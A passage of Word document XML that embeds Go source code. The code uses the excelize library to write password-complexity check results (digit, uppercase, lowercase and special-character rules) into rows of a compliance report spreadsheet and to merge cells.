    <w:p w14:paraId="1E4D0A75" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C96FDFA" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Password.Num.CheckRule,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179A20A3" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Password.Num.Result,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE2C544" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Password.Num.Keyword,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB67016" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Password.Num.Complaince,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF6C02D" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Password.Num.Description,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E37636D" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Password.Num.Advice,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEE27CA" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54792608" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>err = f.SetSheetRow(sheetName_SettingsAndUser, password_num_name, &amp;password_num)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B4DCD8" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23891F71" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fmt.Println(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E87E4C7" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E607F03" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76F54BF6" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码复杂度</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要求大写</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B700D36" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>row++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B7995F" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>password_upper_name, err := excelize.JoinCellName("A", row)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2283B9AA" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>password_upper := []interface{}{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327674AB" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056689A9" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Password.Upper.CheckRule,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BBBB16" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Password.Upper.Result,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420518A7" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Password.Upper.Keyword,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588F9A74" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Password.Upper.Complaince,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1825418A" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Password.Upper.Description,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68500619" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Password.Upper.Advice,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6106EB69" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6181FE6C" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>err = f.SetSheetRow(sheetName_SettingsAndUser, password_upper_name, &amp;password_upper)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530A68EC" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516810F5" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fmt.Println(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205F5E13" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A8B4EE" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3431C084" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码复杂度</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要求小写</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B34850" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>row++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEA2664" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>password_lower_name, err := excelize.JoinCellName("A", row)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CF9197" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>password_lower := []interface{}{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A10F75D" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EE9CBF" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Password.Lower.CheckRule,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1800563B" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Password.Lower.Result,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF8DF3D" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Password.Lower.Keyword,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6998FDC6" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Password.Lower.Complaince,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4C943C" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Password.Lower.Description,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDF8C93" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Password.Lower.Advice,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3420C7E2" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A0F2E7" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>err = f.SetSheetRow(sheetName_SettingsAndUser, password_lower_name, &amp;password_lower)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019384E7" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135E447F" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fmt.Println(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227686EB" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3822AEFD" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="259FF84A" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码复杂度</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要求特殊</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0504FEE9" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>row++</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB3E3D2" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>password_checkrule_merge_end := "A" + strconv.Itoa(row)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F37CB74" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>password_merge_end := "E" + strconv.Itoa(row)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A84E4A8" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>password_special_name, err := excelize.JoinCellName("A", row)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2744A765" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>password_special := []interface{}{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD6A789" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E5DE14" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Password.Special.CheckRule,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65857EA7" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Password.Special.Result,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D58C142" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Password.Special.Keyword,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FACCBA" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Password.Special.Complaince,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108CEDEA" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Password.Special.Description,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098FE488" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>o.Settings.Password.Special.Advice,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703EE38F" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37ACE0F5" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>err = f.SetSheetRow(sheetName_SettingsAndUser, password_special_name, &amp;password_special)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3EE227" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D76F97D" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fmt.Println(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684E0C0C" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153107D2" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1505C681" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码检查项合并单元格</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199CF3B8" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>合并</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>合规情况</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并赋值总合规情况</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> password_merge_start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353E9DCE" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>err = f.MergeCell(sheetName_SettingsAndUser, password_merge_start, password_merge_end)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E38B802" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F80C34" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Println(fmt.Sprintf("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>合并单元格失败</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>错误</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:%s", err))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F8FACF" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BAC1D2" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAA8156" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>f.SetCellBool(sheetName_SettingsAndUser, password_merge_start, o.Settings.Password.Complaince)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B309762" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>合并检查项名称</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> password_checkrule_merge_end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522C6DF5" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>err = f.MergeCell(sheetName_SettingsAndUser, password_checkrule_merge_start, password_checkrule_merge_end)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D83244D" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B145EB5" w14:textId="77777777" w:rsidR="00665D05" w:rsidRDefault="00665D05" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Println(fmt.Sprintf("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>合并单元格失败</w:t>
      </w:r>
      <w:r>
        <w:rPr>
